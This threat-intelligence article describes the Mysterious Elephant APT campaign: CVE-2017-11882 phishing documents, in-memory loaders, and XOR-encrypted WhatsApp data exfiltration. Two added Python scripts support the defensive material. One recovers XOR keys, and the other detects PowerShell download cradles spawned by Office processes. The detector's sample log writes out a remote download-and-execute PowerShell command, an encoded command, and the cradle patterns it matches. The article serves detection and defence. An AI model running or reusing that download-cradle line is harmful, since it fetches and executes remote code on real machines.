In recent months, security researchers have been tracking a threat group called Mysterious Elephant, which they assess as a serious threat in the Asia-Pacific region.


According to the researchers, the group has continuously developed its attack tools from 2023 to the present, targeting government agencies and diplomatic organizations with the goal of gathering confidential information and maintaining long-term access.

Mysterious Elephant's early operations looked simple: phishing emails carrying malicious Office documents. By 2025, however, its tooling had been upgraded significantly.

When the victim opens the document, it exploits CVE-2017-11882, a stack buffer overflow in Microsoft Office's Equation Editor (EQNEDT32.EXE). The bug is years old but still works because many users and organizations have never applied the patch. Once the exploit runs, the document launches a PowerShell command that downloads a malicious implant called BabShell, which researchers regard as the group's foundational tool. BabShell runs quietly and lets the attackers load additional components in memory, leaving few traces on disk.

After the initial compromise, Mysterious Elephant deploys a second loader, MemLoader HidenDesk, which is injected directly into memory; because it never has to exist as a file on disk, it is harder for antivirus software to catch and leaves fewer forensic traces.

Once active, the loader installs a remote access trojan (RAT) that lets the attackers control the system, move laterally to other machines on the local network, and collect sensitive data. The group's main objective is WhatsApp data, including documents, photos and archive files. Collected data is XOR-encrypted before being sent to the command-and-control (C2) server through look-alike domains such as Storycentral.net or monsoonconference.com, so that the exfiltration traffic resembles normal web activity.
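XOR is a weak obfuscation rather than real encryption: if the key is a single byte, an analyst holding a captured exfiltration blob can recover it in 256 tries by checking each candidate plaintext for the magic bytes of the file types the group collects. The script below is an added example written for this article; it is not the group's tooling nor code from the original report, and the sample blob, its key and the file signatures it looks for are constructed assumptions. A longer repeating key would need a known-plaintext (crib) approach instead.

```python
# Added example (not from the article or the threat actor's tooling):
# recover a single-byte XOR key from an exfiltrated blob by testing all
# 256 keys and checking the result for a known file signature.
from typing import Dict, Optional, Tuple

# Magic bytes for file types the article says the group steals
# (documents, photos, archives). DOCX/XLSX/PPTX are ZIP containers.
FILE_MAGIC: Dict[bytes, str] = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip/docx/xlsx",
    b"%PDF": "pdf",
}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (a single-byte key is the common case)."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def identify(data: bytes) -> Optional[str]:
    """Return the file type whose magic bytes prefix the data, if any."""
    for magic, name in FILE_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def recover_single_byte_key(blob: bytes) -> Optional[Tuple[int, str]]:
    """Try all 256 single-byte keys on the header; return (key, filetype) on a hit."""
    header = blob[:8]  # long enough to cover the longest magic in FILE_MAGIC
    for k in range(256):
        kind = identify(xor_bytes(header, bytes([k])))
        if kind:
            return k, kind
    return None


# Constructed sample: a JPEG-like header plus filler, XORed with key 0x5A.
SAMPLE_KEY = 0x5A
SAMPLE_PLAINTEXT = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"constructed image body"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, bytes([SAMPLE_KEY]))

if __name__ == "__main__":
    hit = recover_single_byte_key(SAMPLE_BLOB)
    if hit:
        key, kind = hit
        print(f"key=0x{key:02x} type={kind}")
        print(xor_bytes(SAMPLE_BLOB, bytes([key]))[:16])
    else:
        print("no single-byte key produced a known signature")
```

Running it against the constructed blob reports key 0x5A and a JPEG header; against a real capture, feed the first kilobyte of the C2 POST body rather than the whole transfer, since only the header matters for the signature check.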

This campaign shows the sophistication and persistence characteristic of Advanced Persistent Threat (APT) groups. The combination of open-source tools and custom malware suggests that Mysterious Elephant has strong technical expertise and an in-depth understanding of enterprise security controls. Attacks have so far been observed mainly against state agencies, diplomatic organizations and the financial sector, and they affect the whole Asia-Pacific region.

If not detected early, the group can maintain access for months, gather strategic information, or use the compromised network as a springboard for further attacks.

To limit the risk from campaigns such as Mysterious Elephant's, organizations should:

  • Apply security patches fully, especially for old but still-exploited bugs such as CVE-2017-11882; Microsoft's January 2018 Office updates removed the vulnerable Equation Editor component entirely, so a fully patched Office no longer has it.
  • Train employees to recognize phishing emails and not to open suspicious attachments.
  • Monitor network traffic for connections to suspicious or newly registered domains.
  • Deploy EDR/XDR solutions that can detect abnormal in-memory activity such as process injection and fileless loaders.
  • Review system logs regularly for PowerShell launched from Office processes and for unexpected DLL loads.
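The infection chain described earlier (Equation Editor spawning PowerShell with a download command) and the last monitoring point in the list above can be turned into one concrete detection: flag process-creation events where EQNEDT32.EXE or another Office process launches a script host, and score the command line for download-cradle indicators. The script below is an added example for this article, not a rule from the original report or any vendor product; its log line format is a simplified, constructed "parent=...;child=...;cmdline=..." record rather than real Sysmon or Windows Security output, and the sample lines are invented.

```python
# Added example (not from the article): detect Office processes spawning
# script hosts and score the child command line for download-cradle
# indicators. Input format is a constructed, simplified event record:
#   parent=<exe>;child=<exe>;cmdline=<full command line>
import re
from dataclasses import dataclass, field
from typing import Dict, List

# EQNEDT32.EXE is the Equation Editor process that CVE-2017-11882 exploits run in.
OFFICE_PARENTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                   "wscript.exe", "cscript.exe", "rundll32.exe"}

# (label, pattern) pairs; 'encoded' alone is enough to flag, others need two hits.
CRADLE_PATTERNS = [
    ("download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I)),
    ("iex", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("encoded", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]


@dataclass
class Alert:
    line_no: int
    parent: str
    child: str
    reasons: List[str] = field(default_factory=list)


def parse_line(line: str) -> Dict[str, str]:
    """Split 'k=v;k=v;cmdline=...' into a dict; cmdline may itself contain ';' or '='."""
    parts = line.strip().split(";", 2)
    return dict(p.split("=", 1) for p in parts if "=" in p)


def analyze(lines: List[str]) -> List[Alert]:
    """Return one Alert per suspicious process-creation record."""
    alerts: List[Alert] = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        parent = rec.get("parent", "").lower()
        child = rec.get("child", "").lower()
        cmd = rec.get("cmdline", "")
        reasons: List[str] = []
        if parent == "eqnedt32.exe" and child in SCRIPT_CHILDREN:
            reasons.append("Equation Editor spawned a script host (CVE-2017-11882 pattern)")
        elif parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
            reasons.append("Office process spawned a script host")
        hits = [label for label, pat in CRADLE_PATTERNS if pat.search(cmd)]
        if child in SCRIPT_CHILDREN and ("encoded" in hits or len(hits) >= 2):
            reasons.append("command-line indicators: " + ", ".join(hits))
        if reasons:
            alerts.append(Alert(n, parent, child, reasons))
    return alerts


# Constructed sample events (not real telemetry). Line 1 mimics the chain in
# the article; line 4 is an encoded command from Outlook; 2 and 3 are benign.
SAMPLE_LOG = [
    "parent=EQNEDT32.EXE;child=powershell.exe;cmdline=powershell -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "parent=WINWORD.EXE;child=splwow64.exe;cmdline=splwow64.exe 12288",
    "parent=explorer.exe;child=powershell.exe;cmdline=powershell Get-ChildItem C:\\Temp",
    "parent=OUTLOOK.EXE;child=cmd.exe;cmdline=cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=",
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.parent} -> {a.child}")
        for r in a.reasons:
            print(f"    {r}")
```

The parent/child pairing is the high-confidence signal: a benign Equation Editor session has no reason to start PowerShell at all, so that rule should page regardless of the command line. The cradle scoring is there for the Office-parent cases, where a single URL in a PowerShell command line is common enough that one indicator on its own would be noisy.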

Mysterious Elephant shows that old vulnerabilities remain an effective entry point as long as patching is neglected. Given the level of APT activity in the region, agencies and businesses need to defend proactively rather than reacting only after they have been attacked.

WhiteHat